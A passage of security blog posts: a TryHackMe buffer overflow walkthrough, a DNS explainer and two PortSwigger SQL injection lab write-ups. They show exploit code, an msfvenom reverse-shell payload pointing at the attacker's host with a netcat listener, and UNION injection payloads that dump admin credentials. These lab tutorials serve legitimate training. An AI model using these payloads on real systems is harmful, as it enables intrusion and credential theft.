payload = <sniped>"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4A"<sniped>
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

Finding The EIP Offset

Next, we need to find the EIP offset. By all means, go and research what the EIP offset is used for, I’m not going to explain a lot in detail here as the post will be long enough. Anyway, restart and reopen the vulnerable OSCP program and then launch your python exploit script.

python3 exp.py

Once the Python exploit has crashed the script, head over to the immunity debugger and run the following Mona command to find the EIP offset.

!mona findmsp -distance 2000

This should open the Log window but if it doesn’t then open it manually and look for the following entry in the output.

EIP contains normal pattern : ... (offset 1978)

Creating a Byte Array

For Buffer Overflows to be successful we need to ensure that our payloads don’t contain any bad characters. To explain, bad characters such as null bytes (\x00) could cause our payload to crash the program rather than executing the code we specify.

First, we need to modify our exploit script and set the ‘retn’ variable to ‘BBBB’. Next, we need to set the offset variable to the EIP offset value we discovered earlier (1978). Then we need to use Mona to create a Byte Array to compare our payload to. This Byte Array will exclude all the bad characters we find starting with the Null Byte.

!mona bytearray -b "\x00"

In order for us to identify the bad characters, we need to create our own byte array to use as a payload. This can be done using the script below. Copy and save the script to a name of your choice, I chose bad.py. Copy the output of the script and paste it into the payload variable of the exploit script.

for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()
Creating a Byte Array
Creating a Byte Array
Adding Byte Array To Buffer Overflows Exploit Script
Adding Byte Array To Buffer Overflows Exploit Script

Finding Bad Characters

Back to finding bad characters, reopen and run the vulnerable OSCP.exe application. Then run your Python buffer overflows exploit script.

Buffer Overflows Python Script
Buffer Overflows Python Script

Once the script has been completed, head back to the Immunity Debugger and loo for the ESP register in the CPU window.

ESP Address in Immunity Debugger
ESP Address in Immunity Debugger

Right click the ESP register and copy the address to your clip then run the following Mona command to compare it to the Byte Array that Mono created earlier. As shown below, this produces a window containing all the bad characters that we need to eliminate from our script. However, some of these characters may not be bad characters. For example \x07 and \x08 are both listed as bad characters but it could be that \x07 is bleeding into \x08 and making it look bad. Therefore, we need to repeat the process we just did and eliminate each bad character one at a time.

  !mona compare -f C:\mona\oscp\bytearray.bin -a 01AFFA30
Buffer Overflows Bad Characters
Buffer Overflows Bad Characters

Reapting The Process

I won’t walk you through each step individually but I will include some code below which should help you to repeat the steps we just did.

Create Byte Array
!mona bytearray -b "\x00"
Remove byte from payload string
run
get ESP address
Compare
!mona compare -f C:\mona\oscp\bytearray.bin -a 018BFA30

!mona bytearray -b "\x00\x07"
remove \x07 byte from payload string
run
get ESP address
Compare
!mona compare -f C:\mona\oscp\bytearray.bin -a 019AFA30

!mona bytearray -b "\x00\x07\x2e"
remove \x2e byte from payload string
run
get ESP address
Compare
!mona compare -f C:\mona\oscp\bytearray.bin -a 019AFA30

Keep repeating the process until there are no more bad characters and your comparison results look like the image below.

Immunity Debugger Bad Character Comparison
Immunity Debugger Bad Character Comparison

Finding The Jump Point

Now that we have identified all the bad characters, we can use Mona to find a Jump point in the application that excludes all these bad characters. Again, I don’t have a clue what I’m talking about, I’m just following a process and rewriting it. As you can see from the command below, we are asking Monda to find a jump point excluding all the bad characters we have eliminated.

 !mona jmp -r esp -cpb "\x00\x07\x2e\xa0"
Buffer Overflows Jump Point
Buffer Overflows Jump Point

Creating The Buffer Overflow Exploit

We now need to create our payload. As can be seen from the snippet and image below, we can use msfvenom to create it for us. Ensure you select the correct payload, change your LHOST address, and include the bad characters. We include the bad characters to ensure that the payload doesn’t contain any.

msfvenom -p windows/shell_reverse_tcp LHOST=10.18.127.129 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c

   

Msfvenom Buffer Overflows Payload
Msfvenom Buffer Overflows Payload

Next, we need to modify our Python exploit script to add the payload and return address (the JMP address we just found). Ensure that the payload starts with an open bracket and double speech mark, and closes with a double speech mark and close bracket. When adding the return address, you need to reverse the JMP address. See the image below for details. The original JMP address is in blue as a comment. You can see that 625011af becomes \xaf\x11\x50\x62. You also need to add the padding as shown below (padding = “\x90” * 16).

Buffer Overflows Exploit
Buffer Overflows Exploit

Exploiting The Buffer Overflow

First, reopen the oscp.exe vulnerable program and run it. Next, create a net cat listener on your attack host.

┌─[✗]─[[email protected]]─[~/OF]
└──╼ $sudo nc -lvnp 4444
listening on [any] 4444 ...
NetCat Listener
NetCat Listener

Finally…. RUN… THE… EXPLOIT…

Buffer Overflow Complete
Buffer Overflow Complete

Conclusions

Going through the Buffer Overflow series on TryHackMe has taught me a lot about failure and success. It has allowed me to reflect on how impatient I can be when things aren’t going my way. I feel that this is such a relevant topic in society today. A lot of things aren’t going our way right now. Ukraine is being invaded by Russia, the cost of living crisis, our clueless leadership and so much more. It’s all incredibly frustrating to sit back and watch. Sometimes I just want to fast forward life until it isn’t so crappy again. However, our failures and setbacks allow us to appreciate the good things in life when they do happen. I was overjoyed when I finally got this exploit to work. Granted it is insignificant to the problems in the world but perhaps something better is just on the horizon.

Domain Name System Simplified

Hello world, and welcome to HaXeZ. Today I want to talk about the Domain Name System (DNS). I know, I know, most of you probably already know how DNS works. However, I’m going to be writing an article soon about Firewall Evasion and Data Exfiltration through DNS Tunnelling and I needed to brush up on my DNS knowledge. Never wanting to waste an opportunity, I thought it would make for a good blog post and video so here we are.

What Is The Domain Name System?

Domain Name System or DNS is a hierarchical system for translating text to IP addresses. It relies on various nameservers at various levels. A nameserver is a server that holds records for domains whether they are top-level domains (TLD) or fully qualified domains (FQDN). At the very top of the hierarchy are the root servers. These root servers hold the DNS record information for the top-level domains. This information is stored in something called a zone file. You can perform a DNS zone transfer using many tools, the example below uses Nmap.

sudo nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=zonetransfer.me -p53 nsztm1.digi.ninja
DNS Zone File
DNS Zone File

The zone file contains entries such as the nameservers for the top-level domains. Underneath the root nameservers are the top-level domain nameservers. The same principle applies here in that the top-level domain nameservers contain information about the fully qualified domain nameservers. At the bottom of the hierarchy is the domain’s authoritative nameservers which contain records such as A, MX, NS, TXT, and many others.

What Is The Domain Name System?
What Is The Domain Name System?

Domain Structure

If we look at the web address haxez.org we can see that it has multiple sections. You may not know about the first section as it doesn’t tend to be represented by anything. In some cases, it can be represented by a full stop but most Domain Name System nameservers don’t require the full stop in order for it to work. The full stop comes at the end of the ‘.ORG’ section and signifies a root nameserver. Root nameservers hold the IP addresses of the top-level domain (TLD) (COM, NET, ORG,) nameservers. The ‘ORG’ section of the address is a top-level domain. The ‘haxez’ portion of the address is the domain. Anything that comes before haxez.org would be a subdomain. For example, www.haxez.org where www is the subdomain, and haxez is the fully qualified domain.

Domain Name System Domain Structure
Domain Name System Domain Structure

How Does The Domain Name System Work?

When you type a URL into your browser a number of things happen. Using various online resources I’ve broken it down into 10 steps. I’ve overly simplified the process but there is a lot more going on such as caching, virtual host magic, TCP handshakes, and GET requests.

  1. The client queries the DNS resolver for the location of the domain name,
  2. The DNS resolver queries a root nameserver for the location of the top-level domain (.COM, .ORG, .CO.UK, .NET) nameserver,
  3. The root nameserver responds to the DNS resolver with the IP address of the top level domain nameserver,
  4. The DNS resolver then queries the top level domain nameserver for the location of the domain’s authoritative nameserver,
  5. The top-level domain nameserver tells the DNS resolver the IP address of the authoritative nameserver.
  6. The DNS Resolver then queries the authoritative nameserver for the IP address of the domain.
  7. The authoritative nameserver tells the DNS resolver the IP address of the domain,
  8. The DNS resolver responds back to the client with the IP address of the domain,
  9. The client then sends the request to the target IP address,
  10. The target IP address would then respond with the information the client requested.
Domain Name System Process
Domain Name System Process

DNS Demonstration

Let’s start at the top! using the tool nslookup we can query the root nameservers. We simply set the type of query to the nameserver and then use a full stop to specify the root servers. As you can see from the output below, nslookup returns all the root server nameservers.

┌─[[email protected]]─[~]
└──╼ $nslookup
> set type=ns
> .
Server:		192.168.0.1
Address:	192.168.0.1#53
Non-authoritative answer:
.	nameserver = c.root-servers.net.
.	nameserver = d.root-servers.net.
.	nameserver = e.root-servers.net.
.	nameserver = f.root-servers.net.
.	nameserver = g.root-servers.net.
.	nameserver = h.root-servers.net.
.	nameserver = i.root-servers.net.
.	nameserver = j.root-servers.net.
.	nameserver = k.root-servers.net.
.	nameserver = l.root-servers.net.
.	nameserver = m.root-servers.net.
.	nameserver = a.root-servers.net.
.	nameserver = b.root-servers.net.
Authoritative answers can be found from:

In order to query the root server nameservers, we need to find out what their IP addresses are. In order to do that we set the query type to an A record. An A record translates a word to an IP address.

> set type=a
> a.root-servers.net
Server:		192.168.0.1
Address:	192.168.0.1#53
Non-authoritative answer:
Name:	a.root-servers.net
Address: 198.41.0.4

Next, we need to find the nameservers of the top-level domain. In order to do that, we first set our server to the IP address that we just obtained from our A record query. Next, we set the record type to the nameserver and then query the “.COM” top-level domain. However, ensure you put a full stop after it.

> server 198.41.0.4
Default server: 198.41.0.4
Address: 198.41.0.4#53
> set type=ns
> com.
;; Truncated, retrying in TCP mode.
Server:		198.41.0.4
Address:	198.41.0.4#53
Non-authoritative answer:
*** Can't find com.: No answer
Authoritative answers can be found from:
com	nameserver = e.gtld-servers.net.
com	nameserver = b.gtld-servers.net.
com	nameserver = j.gtld-servers.net.
com	nameserver = m.gtld-servers.net.
com	nameserver = i.gtld-servers.net.
com	nameserver = f.gtld-servers.net.
com	nameserver = a.gtld-servers.net.
com	nameserver = g.gtld-servers.net.
com	nameserver = h.gtld-servers.net.
com	nameserver = l.gtld-servers.net.
com	nameserver = k.gtld-servers.net.
com	nameserver = c.gtld-servers.net.
com	nameserver = d.gtld-servers.net.
e.gtld-servers.net	internet address = 192.12.94.30
e.gtld-servers.net	has AAAA address 2001:502:1ca1::30
b.gtld-servers.net	internet address = 192.33.14.30
b.gtld-servers.net	has AAAA address 2001:503:231d::2:30
j.gtld-servers.net	internet address = 192.48.79.30
j.gtld-servers.net	has AAAA address 2001:502:7094::30
m.gtld-servers.net	internet address = 192.55.83.30
m.gtld-servers.net	has AAAA address 2001:501:b1f9::30
i.gtld-servers.net	internet address = 192.43.172.30
i.gtld-servers.net	has AAAA address 2001:503:39c1::30
f.gtld-servers.net	internet address = 192.35.51.30
f.gtld-servers.net	has AAAA address 2001:503:d414::30
a.gtld-servers.net	internet address = 192.5.6.30
a.gtld-servers.net	has AAAA address 2001:503:a83e::2:30
g.gtld-servers.net	internet address = 192.42.93.30
g.gtld-servers.net	has AAAA address 2001:503:eea3::30
h.gtld-servers.net	internet address = 192.54.112.30
h.gtld-servers.net	has AAAA address 2001:502:8cc::30
l.gtld-servers.net	internet address = 192.41.162.30
l.gtld-servers.net	has AAAA address 2001:500:d937::30
k.gtld-servers.net	internet address = 192.52.178.30
k.gtld-servers.net	has AAAA address 2001:503:d2d::30
c.gtld-servers.net	internet address = 192.26.92.30
c.gtld-servers.net	has AAAA address 2001:503:83eb::30
d.gtld-servers.net	internet address = 192.31.80.30
d.gtld-servers.net	has AAAA address 2001:500:856e::30

We get a lot of results but we should be able to set any of these to our DNS resolver in order to query it for a specific domain nameserver. Set the server to one of the IP addresses listed above and then set the type to nameserver again. Then, choose a domain and punch It in to find its nameservers.

> server 192.5.6.30
Default server: 192.5.6.30
Address: 192.5.6.30#53
> set type=ns
> google.com.
Server:		192.5.6.30
Address:	192.5.6.30#53
Non-authoritative answer:
*** Can't find google.com.: No answer
Authoritative answers can be found from:
google.com	nameserver = ns2.google.com.
google.com	nameserver = ns1.google.com.
google.com	nameserver = ns3.google.com.
google.com	nameserver = ns4.google.com.
ns2.google.com	has AAAA address 2001:4860:4802:34::a
ns2.google.com	internet address = 216.239.34.10
ns1.google.com	has AAAA address 2001:4860:4802:32::a
ns1.google.com	internet address = 216.239.32.10
ns3.google.com	has AAAA address 2001:4860:4802:36::a
ns3.google.com	internet address = 216.239.36.10
ns4.google.com	has AAAA address 2001:4860:4802:38::a
ns4.google.com	internet address = 216.239.38.10

Finally, we can now set our DNS resolver to one of googles nameservers and query it to find A records such as mail. This could of course be scripted to automatically run through each of these steps automatically and perform a subdomain brute force attack against the servers. I believe there is already a tool called Fierce that does exactly that.

> server 216.239.32.10
Default server: 216.239.32.10
Address: 216.239.32.10#53
> set type=a
> mail.google.com.
Server:		216.239.32.10
Address:	216.239.32.10#53
Name:	mail.google.com
Address: 142.250.178.5

Conclusion

I know this isn’t hacking but it’s essential to have a good understanding of the technologies that make the internet and the world wide web possible. There is a lot more to DNS than I’ve covered here. I haven’t discussed the various record types like MX, TXT, and CNAME that can be added to a zone file. I haven’t talked about propagation and caching.

DNS is such as fascinating subject to study because the problem is always DNS. Joking aside, without DNS we would have to remember the IP addresses of every website we wanted to visit. Oh, and those root servers at the top of the tree, if they go down then so does the internet. No more name resolution means anything that has been developed with resources being pulled via domain names will no longer work. It’s a terrifying prospect, especially with all the recent talk of cyber armageddon from the World Economic Forum. If someone with a zero-day were to get into those root servers and mess up the zone files then it would cause chaos. Hopefully, there is some hidden redundancy and backups to mitigate that possibility. Those 13 nameservers are the unsung heroes of the internet and to them I say, thank you. Keep computing away you absolute legends.

PortSwigger: SQL injection attack, listing the database contents on Oracle

Hello world, and welcome to HaXeZ where today we’re looking at PortSwigger Web Security Academy: SQL injection 8. This lab requires you to query the information schema to get the table name, and column names and then perform a UNION injection to get the administration username and password. It’s the same as the last lab except this time we need to alter our syntax as we’re doing it against an Oracle database.

SQL injection attack, listing the database contents on Oracle
SQL injection attack, listing the database contents on Oracle

SQL injection attack, listing the database contents on Oracle

So as stated in the introduction, we need to use Oracle database syntax to perform a UNION-based SQL injection to retrieve the contents of the database. More specifically, we need to dump the contents of the users’ table and log in to the application as the administrator in order to solve the lab.

The Lab
The Lab

The Application

First things first, we need to explore the familiar application. it’s exactly the same as with the previous lab. There is a navigation menu at the top of the page and some product details underneath. It appears there are two columns, which we can validate using the ‘NULL, NULL+FROM+DUAL-- ‘ syntax that we used in previous exercises.

The Application
The Application

Querying The Database Tables

Once we have verified that there are two columns and that both allow text, we can start querying the database for all table names. Instead of querying the ‘information.schema‘ table that we use in the previous lab, this time we have to query ‘all_tables‘. The syntax below will return all tables currently in the database. Please note that rendering directly through burp may not show all the tables. I had to switch back to the raw mode in order to find the user’s table.

GET /filter?category=Accessories'+UNION+SELECT+table_name,NULL+FROM+all_tables-- HTTP/1.1
SQL Injection - Querying The Database Tables
SQL Injection – Querying The Database Tables

Querying The Table Columns

Once we have the table name, in this case ‘USERS_GVOYYA‘, we can start querying the columns within that table. In order to do this, we need to use ‘all_tab_columns‘ and specify the table which we found using the previous command. As you can see from the screenshot below, this produces two results ‘PASSWORD_HPZDJL‘ and ‘USERNAME_SYDOYL‘.

GET /filter?category=Accessories'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_GVOYYA'-- HTTP/1.1
SQL Injection - Querying The Table Columns
SQL Injection – Querying The Table Columns

Querying The Colum Data

We now have everything we need to query the table directory and get it to dump its secrets. The screenshot below illustrates that it was possible to dump the contents of the ‘USERS_GVOYYA‘ including the username and password of the administrator users. Using this information we should be able to complete the lab.

GET /filter?category=Accessories'+UNION+SELECT+PASSWORD_HPZDJL,+USERNAME_SYDOYL+FROM+USERS_GVOYYA-- HTTP/1.
SQL Injection - Querying The Colum Data
SQL Injection – Querying The Colum Data

The SQL Injection

Then take results of the SQL injection and head over to the login page link at the top of the screen. Input your newly acquired username and password and you should solve the lab. Congratulations.

Log in
Log in

PortSwigger: SQL injection attack, listing the database contents on non-Oracle databases

Hello World, and welcome to HaXeZ where today we’re looking at PortSwigger Web Security Academy: SQL injection 7. This lab requires you to query the information schema to get the table name, and column names and then perform a UNION injection to get the administration username and password.

SQL injection attack, listing the database contents on non-Oracle databases
SQL injection attack, listing the database contents on non-Oracle databases

SQL injection attack, listing the database contents on non-Oracle databases

So as mentioned above, this lab requires some logical thinking when structuring your query. First, you need to query the information schema to find out what tables there are. Then you need to query it again to find out what columns are in a particular table. Finally, you have to modify your attack to query the specific table to return the contents of the specified columns.

SQL injection lab
The Lab

The Application

Navigating to the application we can see it is laid out like the rest of them with the navigation menu at the top and the list of products underneath. In order to capture a request, we need to turn the intruder on in Burp Suite and click on the navigation URLs to capture it.

The Application
The Application

Querying The Database Tables

With the request captured, we can perform our standard column enumeration to determine how many columns there are and which columns contain text. Once we have identified that there are two columns that both contain text, we can query the ‘information_schema‘ table so that it returns the names of all other tables in the database.

'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
SQL Injection - Querying The Database Tables
SQL Injection – Querying The Database Tables

Querying The Table Columns

Now that we know the names of the tables, we can identify which tables might be interesting. Looking at the results we can see that there is a table called ‘users_odzpcz‘. This table will likely contain some juicy user credentials but in order to proceed, we need to know what columns are in that table. The image below shows the result of the query where we’re asking for the column names.

'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_odzpcz'--
SQL Injection - Querying The Table Columns
SQL Injection – Querying The Table Columns

Querying The Colum Data

Now that we have the column names, we can query the table directly and ask it to dump the contents of the two columns ‘password_nawvpk‘ and ‘username_bzubfy‘. I found that it was important to put the column names in the order that they appeared in the previous query. Otherwise, I just received a server error.

'+UNION+SELECT+password_nawvpk,+username_bzubfy+FROM+users_odzpcz--
Querying The Colum Data
SQL Injection – Querying The Colum Data

The SQL Injection

With the SQL injection complete, all we need to do is look through the data and locate the administrator username and password. Once we have that information, we can head to the login page and use the credentials to log in and complete the lab.

The Login
The Login